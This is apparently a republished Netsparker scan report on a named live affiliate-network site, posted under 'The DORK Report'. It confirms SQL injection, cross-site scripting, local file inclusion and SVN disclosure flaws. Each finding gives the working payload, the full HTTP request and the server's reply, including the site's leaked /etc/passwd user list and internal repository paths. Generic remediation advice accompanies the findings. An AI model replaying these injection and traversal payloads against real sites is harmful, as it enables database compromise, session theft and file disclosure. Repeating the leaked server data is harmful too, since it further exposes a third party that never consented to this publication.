The DORK Report

Loading
Netsparker, Web Application Security Scanner

SQL Injection, Database User Admin, XSS, CWE-89, CWE-79, darkblue.com

Netsparker - Scan Report Summary
TARGET URL
 http://darkblue.com/
SCAN DATE
 1/4/2011 11:12:26 AM
REPORT DATE
 2/28/2011 10:16:27 AM
SCAN DURATION
 00:12:59

Total Requests

Average Speed

req/sec.
21
identified
11
confirmed
2
critical
6
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
10 %
IMPORTANT
33 %
MEDIUM
5 %
LOW
24 %
INFORMATION
29 %
Blind SQL Injection

Blind SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /index.htm

/index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=forgotpassword

Parameters

Parameter Type Value
info GET 1
section GET forgotpassword
email POST -111' OR SLEEP(25)=0 LIMIT 1--
sent POST true
submit POST 3

Request

POST /index.htm?info=1&section=forgotpassword HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 66
Accept-Encoding: gzip, deflate

email=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 1014
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body><div id="password-retrieval"><h2>Password Retrieval</h2><br /> <p>Your password has been sent to -111' OR SLEEP(25)=0 LIMIT 1-- <br></p> <br /> <p>You may now close this window.</p></div></body></html>
Boolean Based SQL Injection

Boolean Based SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

- /index.htm

/index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=forgotpassword

Parameters

Parameter Type Value
info GET 1
section GET forgotpassword
email POST ' OR 'ns'='ns
sent POST true
submit POST 3

Request

POST /index.htm?info=1&section=forgotpassword HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 40
Accept-Encoding: gzip, deflate

email='+OR+'ns'%3d'ns&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 996
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body><div id="password-retrieval"><h2>Password Retrieval</h2><br /> <p>Your password has been sent to ' OR 'ns'='ns<br></p> <br /> <p>You may now close this window.</p></div></body></html>
Cross-site Scripting

Cross-site Scripting

3 TOTAL
IMPORTANT
CONFIRMED
3
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /index.htm

/index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=forgotpassword

Parameters

Parameter Type Value
info GET 1
section GET forgotpassword
email POST '"--></style></script><script>alert(0x0000C5)</script>
sent POST true
submit POST 3

Request

POST /index.htm?info=1&section=forgotpassword HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 110
Accept-Encoding: gzip, deflate

email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0000C5)%3c%2fscript%3e&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 1102
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body><div id="password-retrieval"><h2>Password Retrieval</h2><br /> <p>Could not find account with email as '"--></style></script><script>netsparker(0x0000C5)</script><p><a href="#" onClick="history.go(-1)">Try Again?</a><br></p> <br /> <p>You may now close this window.</p></div></body></html>
- /.svn/text-base/api.php.svn-base

/.svn/text-base/api.php.svn-base CONFIRMED

http://darkblue.com/.svn/text-base/api.php.svn-base?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x001179)</script>

Request

GET /.svn/text-base/api.php.svn-base?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001179)%3C%2Fscript%3E HTTP/1.1
Referer: http://darkblue.com/.svn/text-base/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:22:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 151
Content-Type: text/html; charset=UTF-8


<?xml version="1.0" ?><result><error>Unknown command: nsextt= '"--></style></script><script>netsparker(0x001179)</script>()<br/></error></result>
- /.svn/text-base/advSignup.php.svn-base/%22%20stYle=%22x:expre/**/ssion(alert(9))

/.svn/text-base/advSignup.php.svn-base/%22%20stYle=%22x:expre/**/ssion(alert(9)) CONFIRMED

http://darkblue.com/.svn/text-base/advSignup.php.svn-base/%22%20stYle=%22x:expre/**/ssion(alert(9))

Parameters

Parameter Type Value
URI-BASED Raw URI /" stYle="x:expre/**/ssion(alert(9))

Request

GET /.svn/text-base/advSignup.php.svn-base/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: http://darkblue.com/.svn/text-base/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:22:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 4222
Content-Type: text/html; charset=UTF-8


<!-- Start Left Text Description --> <tr align="left" valign="top"> <td width="100%" height="100%" bgcolor="#FFFFFF"> <table width="100%" border="0" cellspacing="10" cellpadding="0" height="100%"> <tr align="left" valign="top"> <td class=left> <img src="images/welcome.gif" width="102" height="31" alt="Welcome"> <p>Welcome to the darkblue advertiser signup process. <p>Please enter your details and continue<p></td><!-- End left --><!-- Start middle line --> <td class=line width="1"> <img src="images/spacer.gif" width="1" height="1"> </td><!-- End Middle Line --><!-- Start Signup Section --> <td width="500"> <img src="images/starthere.gif" width="87" height="19" alt="Start Here"> <br> <table width="100%" border="0" cellspacing="0" cellpadding="10"> <tr> <td class=signup align="left" valign="top"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td> <img src="images/step01.gif" width="216" height="22" alt="Step 1 of 6: Email Address Verification"> </td> <td align="right" valign="top" width="13"> <a href="help.htm"><img src="images/help.gif" width="13" height="13" border="0" alt="Help"></a> </td> </tr> </table> <p> <form name="form1" method="post" action="/.svn/text-base/advSignup.php.svn-base/" stYle="x:expre/**/ssion(netsparker(9))"> <input type="hidden" name="step" value="2"> <font color="red"><b></b></font><p> Company Name : <br><input class=signuptextfield type="text" name="valArr[companyname]" value="" size="40"><p>Address 1 : <br><input class=signuptextfield type="text" name="valArr[address1]" value="" size="40"><p>Address 2 : <br><input class=signuptextfield type="text" name="valArr[address2]" value="" size="40"><p>City : <br><input class=signuptextfield type="text" name="valArr[city]" value="" size="20"><p>State : <br><input class=signuptextfield type="text" name="valArr[state]" value="" size="5"><p>Zipcode : <br><input class=signuptextfield type="text" name="valArr[zip]" value="" size="10"><p>Country : <br><input class=signuptextfield type="text" name="valArr[country]" value="" size="20"><p>Contact Name : <br><input class=signuptextfield type="text" name="valArr[contactname]" value="" size="40"><p>Phone : <br><input class=signuptextfield type="text" name="valArr[phone]" value="" size="40"><p>Email Address (this is also your username) : <br><input class=signuptextfield type="text" name="valArr[email]" value="" size="40"><p> <p> <input class=signupbutton type="submit" name="Back" value=" Back "> <input class=signupbutton type="submit" name="Next" value=" Next "> </form> <p> <p> </td> </tr> </table> </td> </tr> </table> </td> </tr><!-- End Signup Section --><!-- Start Footer --> <tr align="center" valign="middle"> <td width="100%" height="15" class="whitetext" background="images/bottombar.gif"> <span class="lighttext">� 2002 DarkBlue.com | <a class="lightlink" href="termsandconditions.htm">Terms & Conditions</a> | <a class="lightlink" href="privacypolicy.htm">Privacy Policy</a> | <a class="lightlink" href="mailto:customercare@darkblue.com">Contact us</a></span> <img src="images/spacer.gif" width="20" height="15"> </td> </tr></table><!-- End Footer--></body></html>
Local File Inclusion

Local File Inclusion

2 TOTAL
IMPORTANT
CONFIRMED
2
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. Netsparker confirmed this issue by reading some files from the target web server.

Impact

Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:
  • Gather usernames via /etc/password file
  • Harvest useful information from the log files such as "/apache/logs/error.log" or "/apache/logs/access.log"
  • Remotely execute commands via combining this vulnerability with some of other attack vectors such as file upload vulnerability or log injection.

Remedy

  • If possible, do not accept appending file paths directly. Make it hard-coded or selectable from a limited hard-coded path list via an index variable
  • If you definitely need dynamic path concatenation, ensure that you only accept required characters such as "a-Z0-9" and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
  • Finally it is important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure that any potential attack can not perform a directory traversal attack.
- /index.htm

/index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00

Parameters

Parameter Type Value
info GET 1
section GET ../../../../../CANTBEHERE/../../../../../../etc/passwd

Request

GET /index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00 HTTP/1.1
Referer: http://darkblue.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 2597
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body>root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinpegasus:x:100:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashdbs:x:500:100::/home/dbs:/bin/bashmonit:x:101:101:monit daemon:/var/lib/monit:/bin/shdistcache:x:94:94:Distcache:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrbackup:x:501:501::/home/rbackup:/bin/sh</body></html>
- /index.htm

/index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00

Parameters

Parameter Type Value
info GET 1
section GET ../../../../../CANTBEHERE/../../../../../../etc/passwd
email POST netsparker@example.com
sent POST true
submit POST 3

Request

POST /index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00 HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 49
Accept-Encoding: gzip, deflate

email=netsparker%40example.com&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 2597
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body>root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinpegasus:x:100:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashdbs:x:500:100::/home/dbs:/bin/bashmonit:x:101:101:monit daemon:/var/lib/monit:/bin/shdistcache:x:94:94:Distcache:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrbackup:x:501:501::/home/rbackup:/bin/sh</body></html>
SVN Disclosure

SVN Disclosure

1 TOTAL
IMPORTANT
Netsparker discovered a SVN repository file.

Impact

SVN Repository files can disclose SVN addresses, SVN usernames and date information. While disclosures of this type do not provide chances of direct attack, they can be useful for an attacker when combined with other vulnerabilities or during the exploitation of some other vulnerabilities.

Remedy

Do not leave SVN Repository files on development environments. If there is a business requirement to do so, implement access control mechanisms to stop public access to SVN Repository files.
- /.svn/all-wcprops

/.svn/all-wcprops

http://darkblue.com/.svn/all-wcprops

Request

GET /.svn/all-wcprops HTTP/1.1
Referer: http://darkblue.com/.svn/all-wcprops
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:19 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 08 Nov 2010 00:35:53 GMT
ETag: "6880ce-38f1-ce7e8c40"
Accept-Ranges: bytes
Content-Length: 14577
Content-Type: text/plain; charset=UTF-8


K 25svn:wc:ra_dav:version-urlV 46/dbs/!svn/ver/39652/darkblue/branches/live/wwwENDbanners.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/banners.htmENDpenguins.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/penguins.htmENDdarkblue.cssK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/darkblue.cssENDICQ.gifK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/ICQ.gifENDerror.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/error.htmENDxbTreeWidgetStatic.jsK 25svn:wc:ra_dav:version-urlV 68/dbs/!svn/ver/38013/darkblue/branches/live/www/xbTreeWidgetStatic.jsENDkb-style.cssK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/kb-style.cssENDremittance.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/remittance.phpENDconfirm.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/confirm.htmENDprivacypolicy.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/privacypolicy.htmENDwebhosting_signup.htmK 25svn:wc:ra_dav:version-urlV 68/dbs/!svn/ver/38013/darkblue/branches/live/www/webhosting_signup.htmENDunsorted.pngK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/unsorted.pngENDadvSignup.phpK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/advSignup.phpENDadvindex.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/advindex.htmENDimages.phpK 25svn:wc:ra_dav:version-urlV 57/dbs/!svn/ver/38013/darkblue/branches/live/www/images.phpENDtermsandconditions.phpK 25svn:wc:ra_dav:version-urlV 69/dbs/!svn/ver/38013/darkblue/branches/live/www/termsandconditions.phpENDaffiliates.cssK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/affiliates.cssENDtermsandconditions.htmK 25svn:wc:ra_dav:version-urlV 69/dbs/!svn/ver/38013/darkblue/branches/live/www/termsandconditions.htmENDMSN.gifK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/MSN.gifENDaddSite.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/addSite.htmENDmovesort.curK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/movesort.curENDprefs.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/prefs.htmENDindex_new.htmK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/index_new.htmENDunsorted.gifK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/unsorted.gifENDstat.wmlK 25svn:wc:ra_dav:version-urlV 55/dbs/!svn/ver/38013/darkblue/branches/live/www/stat.wmlENDgstat.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/gstat.htmENDsortdesc.pngK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/sortdesc.pngENDforgotpassword.htmK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/forgotpassword.htmENDcPayout.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/cPayout.phpENDadvfrontpage_subpage.phpK 25svn:wc:ra_dav:version-urlV 71/dbs/!svn/ver/38013/darkblue/branches/live/www/advfrontpage_subpage.phpENDhelp.htmK 25svn:wc:ra_dav:version-urlV 55/dbs/!svn/ver/38013/darkblue/branches/live/www/help.htmENDhealth_signup.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/health_signup.htmENDdating_signup.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/dating_signup.htmENDbalanceDetails.htmK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/balanceDetails.htmENDadvtermsandconditions_adult.htmK 25svn:wc:ra_dav:version-urlV 78/dbs/!svn/ver/38013/darkblue/branches/live/www/advtermsandconditions_adult.htmENDsubcontroller.phpK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/subcontroller.phpENDcaption.htmK 25svn:wc:ra_dav:version-urlV 